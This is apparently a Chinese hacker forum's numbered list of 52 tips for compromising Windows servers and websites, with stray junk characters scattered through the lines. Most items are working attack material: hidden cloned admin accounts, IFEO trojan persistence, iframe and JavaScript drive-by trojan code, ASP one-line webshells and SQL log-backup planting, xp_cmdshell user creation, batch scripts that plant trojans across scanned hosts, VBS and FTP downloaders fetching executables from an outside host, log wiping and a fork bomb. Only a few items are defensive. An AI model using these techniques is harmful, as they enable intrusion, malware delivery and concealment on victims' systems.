1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
5 s; Q! _$ t, |* R5 Ecacls C:\windows\system32 /G hqw20:R
+ L7 J1 g& `, }0 i思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
; c4 E& {) g. M+ `恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F- U8 i* k9 g" T2 U$ L7 {: K
1 x, q2 d/ E/ L2 U' S! M1 C2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
. X' r; w! @9 V* L
; Y$ V) H I; m1 v. H' X- N3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
+ Y | [6 S0 \5 F7 ^' q l/ b4 G0 h0 c# V! M1 o. j% E
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号% q8 J. u; y: j3 \- P' ^. K% b
4 d: Z. x2 {) o- r$ G8 [
5、利用INF文件来修改注册表
0 N+ J- N; a/ R6 W% k) V( |+ g[Version]
) {7 J- Y1 E9 ?) hSignature="$CHICAGO$"- C' P$ s1 F! C% d
[Defaultinstall]3 Q7 A3 @" [8 f0 `3 a
addREG=Ating" c" j5 x' F& y1 s7 l
[Ating]
0 n/ Y. j" n' g' u: fHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
- j6 P9 v+ O# {7 A: f以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
. V- f: B) S& n; y; L* ?% Yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 G* w$ I+ @9 O0 @0 D, l其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
9 N* Q3 G' I& ~" THKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU( ?2 y: P' q1 G& L$ ^. y1 A
HKEY_CURRENT_CONFIG 简写为 HKCC; H6 d. [6 D7 B0 `/ b
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
4 r7 w2 W4 d! V"1"这里代表是写入或删除注册表键值中的具体数据7 X' K6 l4 }" N D! H9 p4 b
3 Y8 \ ~% V' k4 O) ]( F5 Y3 c
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,, ^- [; k0 X d/ x
多了一步就是在防火墙里添加个端口,然后导出其键值: N, O& t3 G/ I, S3 a
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
; G) w4 A" y' m1 N" P" g" [- y7 l- \/ j
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽 ?7 l8 ]9 H' J; l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
% D6 H2 I+ |* a% |
5 O+ ?% Q+ t* H; R6 t5 F8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
& ^2 M/ r1 }4 y0 |8 v3 ~) a' s7 V7 U, h- \: \ G
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
9 g! x- a& g! X7 l可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。$ e1 B* K2 W; O4 t# k; x
, H& a. t, v8 X& g1 t5 ^6 _
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login” f; k3 ?0 D5 ~6 K" _) |
2 B2 K) y- d$ m0 {% D' D8 H11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,4 E0 W+ I/ A, S: V# e4 h! {& z
用法:xsniff –pass –hide –log pass.txt
1 \( h6 v7 `0 b
' Q; g! f0 S% V/ i8 X- l12、google搜索的艺术7 m' w- L& v3 r) U$ M
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ q, o; V( d" i5 v: F5 H8 ?或“字符串的语法错误”可以找到很多sql注入漏洞。
: g* y. v# ?! F& j7 [& V
+ B. ?. H% K7 j& z% x$ l3 M3 g13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) @' w4 W$ l2 F/ n
& S1 K; a Y9 ~* @9 ] g$ ^: u14、cmd中输入 nc –vv –l –p 1987; B3 L/ G( A: ?" T
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
. p9 u4 a$ h9 ~9 m) x$ y/ ~& P4 y2 y) `9 W3 P6 c
15、制作T++木马,先写个ating.hta文件,内容为( \) m6 Y- S @$ C2 l$ D
<script language="VBScript">
( q9 V# N% d' @9 A3 [4 tset wshshell=createobject ("wscript.shell" )
- G% X0 s# |7 H2 V1 F, Ga=wshshell.run("你马的名称",1)9 Z0 _. Q9 o9 ~* K
window.close0 [8 g, k+ M' ]
</script>
/ O6 W X5 p& N' t {% F) h再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 b" A! c* W1 g# W. F6 c3 V$ T: w6 t0 A' R' {0 O ~9 ~8 d
16、搜索栏里输入
/ m3 q+ `9 U' p* J关键字%'and 1=1 and '%'='
3 X; b9 R* R/ q4 i4 j关键字%'and 1=2 and '%'='
+ _2 N: |, R4 l. G比较不同处 可以作为注入的特征字符% x) t4 ?2 M" p, {$ |
8 y3 S% j7 Q' D0 y# L' L3 M/ K! `17、挂马代码<html>
3 `6 V3 ?5 a* e<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>( d4 G5 b8 y# D5 m$ e6 n
</html>3 ?; o$ }/ S+ [) [) F" y
9 K( H3 \0 ?% f& q z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
, L& }* g$ [4 m- D* snet localgroup administrators还是可以看出Guest是管理员来。
8 t( e* H) I% P) C* V. L9 N t4 [& E# K+ s3 G& V9 w3 h# B
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等 q1 X' {, a! X1 e( n
用法: 安装: instsrv.exe 服务名称 路径: l+ I# W7 W& g; N3 P( D: \1 ?; a
卸载: instsrv.exe 服务名称 REMOVE* b1 Y$ ?) y C1 J
! a6 t# W5 F$ [1 X0 M; m
. B6 h& L2 p) t, R) J/ S21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉) c- O4 y1 {, I) y% Q
不能注入时要第一时间想到%5c暴库。* X0 X: f% u+ p# |
! ~: B3 R8 d* [5 P- d9 P Y22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~. w5 q0 a: z4 Z
8 b6 F+ U! r' X' h- Y2 K
23、缺少xp_cmdshell时+ n( I6 Z9 H, z" [5 v6 n
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: W/ P, n! F; I# W( r7 Y2 H假如恢复不成功,可以尝试直接加用户(针对开3389的)
) R7 i3 {9 w( q1 `1 W9 z& {7 ydeclare @o int" ]0 { d8 q9 M% n, S
exec sp_oacreate 'wscript.shell',@o out
" v5 d$ k; e2 i6 `3 ~exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
/ w" v% k1 G, O' f: [! X! _" j+ F
7 Z2 l, O g" X( j: Q* N& D& K24.批量种植木马.bat2 C0 n* o9 I' X3 P/ {: e8 i5 o
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 Y8 R" f& o7 X6 D
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间# z1 x7 e* z4 z, _7 `
扫描地址.txt里每个主机名一行 用\\开头
0 L4 B1 ^! ~0 ^ Q
4 F+ o; y; {" O/ ~25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
2 M) t$ m+ ^/ n; h& b* q, C, l
- J: ?- I- r4 F& ^( U& x26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.1 s/ p* e4 Y g5 s) ~
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
: d6 X6 }2 Q! u7 H9 e5 e) w. R.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
9 A: G0 J j+ o. W/ G
# e8 f" A) {; `4 P8 ~/ `+ X. [27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
1 N9 c3 Y/ _: F8 e9 W然后用#clear logg和#clear line vty *删除日志# m6 m8 W* c& v1 f5 s7 D
- ~, ?2 A2 u7 B# j28、电脑坏了省去重新安装系统的方法 j z5 z K4 y% M) O9 {+ K* i
纯dos下执行,; s/ _8 _% k* i- @- R2 d
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
3 I* n9 t4 z: U9 h8 X6 {2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config2 E% S$ ]/ k: A) Q0 s, r3 L
9 J- [8 p2 i: F; k) H) {- x! s
29、解决TCP/IP筛选 在注册表里有三处,分别是:& P3 x( _& p: f8 [) k
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip6 z+ V. {7 b7 y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( k$ C" e) A$ r, }. n/ e7 ?, HHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# ~/ m, y( x# J分别用% E, v) D; q( }7 ^: h0 k1 O
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 M& h8 h( j/ a& cregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip3 Y6 y$ @$ C/ x9 b) q1 e( c& ~
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! l9 g! ?3 F% I& [* f命令来导出注册表项
" \6 ~* [4 y9 W6 z9 z" l3 G1 I9 c3 s然后把三个文件里的EnableSecurityFilters"=dword:00000001,' _- r9 w4 m- w( S. s7 N) _' }& `
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用. c& R3 w7 c( I7 y8 c' S
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
* J; ^0 j. P8 T# G: a
7 v- X7 G8 A- R30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
1 r) I% z3 O3 NSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3+ M3 k9 y& E8 l0 b0 [" U! M
$ Y+ U) n* T+ }, b. O2 B31、全手工打造开3389工具
0 q4 m4 k; _8 R" n打开记事本,编辑内容如下:
2 ~6 U, _7 G0 Y* e3 b- Cecho [Components] > c:\sql
2 S% \% q- t9 S/ becho TSEnable = on >> c:\sql
& H3 l! ^+ P1 {# M. Ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q/ y( ]; ^8 B# e7 Z
编辑好后存为BAT文件,上传至肉鸡,执行
+ N5 \9 @) I0 L3 d3 B; V W3 i! Q
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
1 S! S! f/ g$ m" \9 ], Y0 S) r# k
3 s7 h2 _5 l+ t& H7 J( |33、让服务器重启
- c$ i9 M' Z/ L写个bat死循环:
6 p% p N- f) E! W' p3 z1 i( u: c@echo off
5 O* b9 l% c! p3 n* z:loop12 K. v6 G! M1 ?: ]1 |
cls
: }& _9 M: [+ q% w7 Wstart cmd.exe
0 i" r0 @) h4 t \$ p# h9 z: U; cgoto loop19 u Y& @0 X( Q7 ^, F4 A) E2 E, m
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启8 P' I+ I7 r# T* V$ O& a" Y6 w
0 q( h2 f% O. i( `: x34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,0 i0 P( J8 h+ r, `+ `5 ?
@echo off
* R7 c5 p/ t6 E$ e3 L( `- pdate /t >c:/3389.txt0 b) A8 g, y4 ^8 ?2 N6 P2 e
time /t >>c:/3389.txt
3 }5 X* r9 c9 f( R- y' [attrib +s +h c:/3389.bat5 K0 G; |; @3 U3 w0 g) S
attrib +s +h c:/3389.txt' F/ \' F( I3 t9 b; l
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& F- d5 p6 \$ N+ R+ u2 ~0 K# L4 X8 W并保存为3389.bat# `/ Q9 I% C( C2 k2 m
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号- S7 I4 v4 e+ g5 F
6 E) O! ~& Z6 R, S2 L35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, ^+ A4 J. s kstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)3 G/ j% y4 p9 j% M1 L
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。: h5 y. y! i- ^, ]
; j+ k% ?5 |6 S1 @. c5 ^36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件: k" k& c" _ o7 X7 r L3 o( z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址 i" M/ \3 H" Q) W
echo 你的FTP账号 >>c:\1.bat //输入账号
0 i& U" f) E, z7 lecho 你的FTP密码 >>c:\1.bat //输入密码4 E8 y$ T) c* {# W- F, H
echo bin >>c:\1.bat //登入
6 y5 Q: ~2 @1 A- |8 L2 J( @echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 u' u0 A U) M `' g: P/ V9 Hecho bye >>c:\1.bat //退出
S% F9 U- T% e2 s1 ]" A3 r然后执行ftp -s:c:\1.bat即可. v9 {# [" |# e5 h
# _# E2 v3 k& z* A/ a
37、修改注册表开3389两法
T- o+ J+ i$ S( ]2 S(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表$ z6 k& a; q& F. ^# {
echo Windows Registry Editor Version 5.00 >>3389.reg
9 U9 ]3 X8 X4 c; a3 A uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
3 S" R! `2 T0 y3 Y2 ]echo "Enabled"="0" >>3389.reg; a$ ^: h. E' G' X/ Q7 s# A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows L- j |* M& P; j9 v& H' }) y/ ~
NT\CurrentVersion\Winlogon] >>3389.reg
# R" F0 R" c* P% Oecho "ShutdownWithoutLogon"="0" >>3389.reg
$ [* r1 V8 y, c& f7 Z4 o) i$ Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
5 |4 x7 h! g4 D* U2 P, a( H9 v" ~>>3389.reg6 m1 W$ x4 i' u- O6 Q3 G+ C
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg: M$ A7 o/ s! @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]6 }5 B9 N4 V. O* W( G. l+ ?) E
>>3389.reg
- w, q O1 ^" P# k) G( decho "TSEnabled"=dword:00000001 >>3389.reg
7 Y- L* H9 m9 Y5 \* ?! Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg" ?8 ?4 x! ?4 C; r
echo "Start"=dword:00000002 >>3389.reg) ]- t0 @; o' t4 q% R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]4 d4 c: p( u6 j8 W$ R
>>3389.reg
" |5 Q/ V4 g8 {8 j/ r. D9 f1 O( Cecho "Start"=dword:00000002 >>3389.reg
9 n6 l0 L8 Q. Z! t T( Becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ ?+ p, q3 r2 S/ M
echo "Hotkey"="1" >>3389.reg
& F2 B9 P% m4 q- j8 S$ W9 d" B5 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# t" C5 \( l& f* w$ R. _# `, ^, ^Server\Wds\rdpwd\Tds\tcp] >>3389.reg6 D% z V& [ ~
echo "PortNumber"=dword:00000D3D >>3389.reg
0 g, X2 ?8 g1 P j. e9 s& h+ Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 h+ ?; x1 T" K0 xServer\WinStations\RDP-Tcp] >>3389.reg
: i4 Z' X1 Z3 Y6 U' S1 hecho "PortNumber"=dword:00000D3D >>3389.reg
V' {) O7 |% J1 [; x. ?把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
7 [* }7 V0 ^0 R. o) D) b; y; X(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
$ b2 s, `9 P8 R& ]3 b& T因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效9 C5 e! @% {- f$ l
(2)winxp和win2003终端开启
# B, c; P; O! D4 i- U用以下ECHO代码写一个REG文件:& B$ r3 c- m. } t1 F; ]
echo Windows Registry Editor Version 5.00>>3389.reg% s2 }/ S- z- ~/ ~, @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* r$ n0 g% v8 t# KServer]>>3389.reg
3 ?0 h: p8 ]8 j% I& wecho "fDenyTSConnections"=dword:00000000>>3389.reg
( y* F9 Z( I: X+ R( i8 oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 P) W8 {! k% Y6 e
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
$ |2 g, ]' N& I% L( N# f5 B! R! ^' P/ Secho "PortNumber"=dword:00000d3d>>3389.reg
5 i1 N5 N1 W- ]9 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. j6 A! {* t" \' A5 h
Server\WinStations\RDP-Tcp]>>3389.reg
; t) O' l3 s p- K2 ?( }echo "PortNumber"=dword:00000d3d>>3389.reg
* _# {( _& r. ]) o! `! ^- C$ E+ E然后regedit /s 3389.reg del 3389.reg
. n# v! x! I4 G- x; R! I, LXP下不论开终端还是改终端端口都不需重启
+ h9 x4 a* V1 C( J, G
+ g6 Z* r9 f- |/ _: O$ |4 U9 J38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
2 f, }6 c9 S0 Y用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
/ Y, r) U7 S3 C5 Z, ?
' Y7 M+ H! E) c39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
) D& L ^- I1 N# f! I$ m- }( z(1)数据库文件名应复杂并要有特殊字符7 u" @- n4 k' |; E
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源8 x2 M- u3 _8 t! C" S2 O7 M: C
将conn.asp文档中的
( F+ q: z' O6 yDBPath = Server.MapPath("数据库.mdb")
C% Q. c! s9 Vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 k- E2 r. ~2 \3 d$ E0 A) \3 A( N
" |9 R$ W; [' |' Q
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置* q; m: ?" [6 P& _4 O
(3)不放在WEB目录里
7 m+ N- \, m% i0 n& X* h
8 s6 X1 N% j+ q+ E( [8 ^40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
+ ]! q6 V( G3 e) ~* x X' f4 w8 z可以写两个bat文件
- `# x! P0 x* J; ~4 w% x( Y! Z2 f@echo off
* J+ Y% ]/ l; B: E( d@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
6 y' `' d) y. a/ `* R9 h* q2 e@del c:\winnt\system32\query.exe
8 O" ^, F( H5 t& u9 N# E( t@del %SYSTEMROOT%\system32\dllcache\query.exe5 p& p& w1 Z& b S0 \
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的4 V3 |6 b9 Y) O- R! v1 E% M$ ~
1 _) f) S7 |! T% I+ b; F@echo off
$ c" M1 S& B d" o@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
$ m0 V; X+ G' g5 k _: k@del c:\winnt\system32\tsadmin.exe) O& n! d! Z7 j* c$ E
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
7 T; a# y, x+ u/ ~/ X4 s
. O* u& o* f. Y41、映射对方盘符
E6 n. F0 ]* ?4 t2 otelnet到他的机器上,
( r. H; I! s6 | f# qnet share 查看有没有默认共享 如果没有,那么就接着运行( j" L* c/ k! j4 f
net share c$=c:7 @! b* K; @0 m6 P
net share现在有c$
5 U" b: o8 U3 L1 S6 K( a9 {/ v- R在自己的机器上运行' C9 W- ?" @4 j" C) ]
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
6 _% ?5 G5 [+ Y0 H5 T ~8 W
" A k! n9 H7 Z' z4 Y42、一些很有用的老知识3 k- @5 c2 g; y& o0 V
type c:\boot.ini ( 查看系统版本 )
7 _, t p8 ~4 y5 g- D6 U& ?8 Y5 r0 Znet start (查看已经启动的服务)( C5 E; q( E, t' @6 m5 C8 _* N
query user ( 查看当前终端连接 )
& |' b! E* }" ` C# cnet user ( 查看当前用户 )
% y1 V! l A. ?8 I+ snet user 用户 密码/add ( 建立账号 )( I& O3 h$ R$ R& c& B, }
net localgroup administrators 用户 /add (提升某用户为管理员)+ S: O0 R, Z* f1 A' ?/ R% p7 i
ipconfig -all ( 查看IP什么的 )$ c' J5 C1 ?$ G9 H7 h L
netstat -an ( 查看当前网络状态 )/ O; x+ t( R2 k# D3 }7 d2 @* L
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
" {3 y% _" j3 }7 J( o克隆时Administrator对应1F4
5 s% B; C4 O6 g, Pguest对应1F58 P" K4 q. j2 E* J
tsinternetuser对应3E8
4 _- q" c/ b) g' N4 U+ {; B" n& x- t. V. z% R8 L
43、如果对方没开3389,但是装了Remote Administrator Service
- \# g7 J# _8 A' i# M4 R用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接3 D9 t2 Q( j. ?" ~( o
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息6 m1 X4 P: z) r6 H. N1 u
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
/ n. B3 d! x# q' { [
; m: L% L# j% k( T) o0 c% |44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
1 [: m2 d# R* \- H) i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)# M1 c/ n0 s( ?& s
" U( x; y9 R* h3 N: x# [
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入). G( Q* U* A/ E0 w
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open: ?& k6 B W8 u" ?9 v9 ?& S) G
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =4 ^* o3 [- A& ^3 Q' K* V8 l6 }( K
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =, R3 |9 R6 U8 t3 j. w# ?
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
, c+ ^* }( n$ z1 Q0 c s- T% M) F(这是完整的一句话,其中没有换行符)
Z B/ T! U2 a9 h然后下载:
6 `# T; l5 s/ @: }1 }, Z. @2 Scscript down.vbs http://www.hack520.org/hack.exe hack.exe
* c; v3 S b1 A0 r
7 x! B2 y7 Y. L/ @% M46、一句话木马成功依赖于两个条件:; h/ v4 D3 H+ h3 j2 T3 x1 P% ?1 }
1、服务端没有禁止adodb.Stream或FSO组件2 h N% N B5 K1 k) U4 F
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
U5 ]' O0 S2 f6 K3 |& J) u/ i% r/ j y- g4 j9 k
47、利用DB_OWNER权限进行手工备份一句话木马的代码:1 c6 ]# `8 U% }9 F) e
;alter database utsz set RECOVERY FULL--4 _! V4 N& H7 P7 |9 @
;create table cmd (a image)--) {$ m" W* A7 i& D& ^3 A1 S
;backup log utsz to disk = 'D:\cmd' with init--
4 j1 j- S2 e4 G, f% q;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--$ p1 R, A, u; f& I8 P4 s. p
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
% M8 d2 K0 X3 J2 S& C. g! \0 |* l注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。( s. Y( r0 h% t" z- O
# H/ y5 \) y; X0 j8 G48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
, n/ @. K; K2 {9 u
. Y1 n+ M5 f& `& d: o用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options$ o0 Y* L, k* A6 k& d
所有会话用 'all'。% x& s# K0 n6 L. j) b% E
-s sessionid 列出会话的信息。+ N/ o( M* Z6 N' f+ S
-k sessionid 终止会话。
( i; f7 }6 }% N! ~0 y7 F-m sessionid 发送消息到会话。
5 M6 j& T; I0 N- A6 f0 G
7 [1 v$ ]9 F6 O: qconfig 配置 telnet 服务器参数。
p5 Y$ P9 t1 n# l7 j4 [, Y' z6 J: Q' j( m8 o
common_options 为:% J8 X& @, G6 [' C, P6 T
-u user 指定要使用其凭据的用户) n# i6 q; g; r0 h7 v
-p password 用户密码
4 i& S1 v. b( K f( I7 e( f5 ]8 e4 T/ Z
config_options 为:
0 s8 u- Q% O& i; D3 g& Xdom = domain 设定用户的默认域) G; _0 F# [* t' e8 K. I
ctrlakeymap = yes|no 设定 ALT 键的映射 H% |) j1 E) Z1 }8 v
timeout = hh:mm:ss 设定空闲会话超时值7 E8 E1 R. i7 O: B
timeoutactive = yes|no 启用空闲会话。
; Q: e. f3 x" d, M( h: a9 gmaxfail = attempts 设定断开前失败的登录企图数。" e. g1 b( G; l$ o4 P
maxconn = connections 设定最大连接数。# ^- D8 e7 k% t1 }2 I
port = number 设定 telnet 端口。
! D1 C4 o5 W& Fsec = [+/-]NTLM [+/-]passwd
1 J9 L' s6 T/ D# K: N( @设定身份验证机构
9 d0 w4 w( I; M4 ~" A7 ffname = file 指定审计文件名。. O+ c7 D$ `! B! ]: g; M
fsize = size 指定审计文件的最大尺寸(MB)。, t5 Q5 e3 f% B. y4 c
mode = console|stream 指定操作模式。$ f- s8 x" c7 g T* c
auditlocation = eventlog|file|both% s! w* O a# M8 q4 x' h: j4 V I
指定记录地点
0 p& Q) u& ^& S$ r8 D) b( Yaudit = [+/-]user [+/-]fail [+/-]admin
x, d* T& r' ~2 P5 n* S; o1 C: o' {" m# ~4 i5 |% N; A
49、例如:在IE上访问:
8 g. ]6 m% m/ m0 S: H- r# Z4 nwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/! }) h- Z, ^* `; O# ~" I9 c$ B
hack.txt里面的代码是:( r) P+ j) D9 ], y( \$ v
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( @! E! A: _, m' V2 O把这个hack.txt发到你空间就可以了!
& v- e; w! Z: U" C; t+ z这个可以利用来做网马哦!
8 A& H* }3 w2 T
0 V; r: T) c7 p" m, r50、autorun的病毒可以通过手动限制!, }. S+ f7 h+ d/ {7 f
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
, B: K/ p O. O" i+ `$ K3 p" `2,打开盘符用右键打开!切忌双击盘符~
0 s: w6 ^+ M M* q6 O3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!+ b! b; k3 j# v, M2 S% K0 I1 j0 ]
! @9 f; E5 M& F
51、log备份时的一句话木马:+ h7 ^: o Z5 o% Q9 f
a).<%%25Execute(request("go"))%%25>
. J5 R/ F$ F, A) H3 Ob).<%Execute(request("go"))%>) H% o! w7 S. F Z2 [5 N1 K C
c).%><%execute request("go")%><%
% Q& }# i. h5 m+ ~- K5 `- Qd).<script language=VBScript runat=server>execute request("sb")</Script>
: X% [- ?% `7 e+ B2 re).<%25Execute(request("l"))%25>9 ^2 \1 T; v. v+ G4 G8 X; R; W! i, K O
f).<%if request("cmd")<>"" then execute request("pass")%>
7 G9 Y" I5 C. Z" U7 E4 S! F
/ |( S/ r; ^* p1 v% \% g4 r. M52、at "12:17" /interactive cmd
( ]7 R/ c% |& f; X W% k4 E. E# c执行后可以用AT命令查看新加的任务
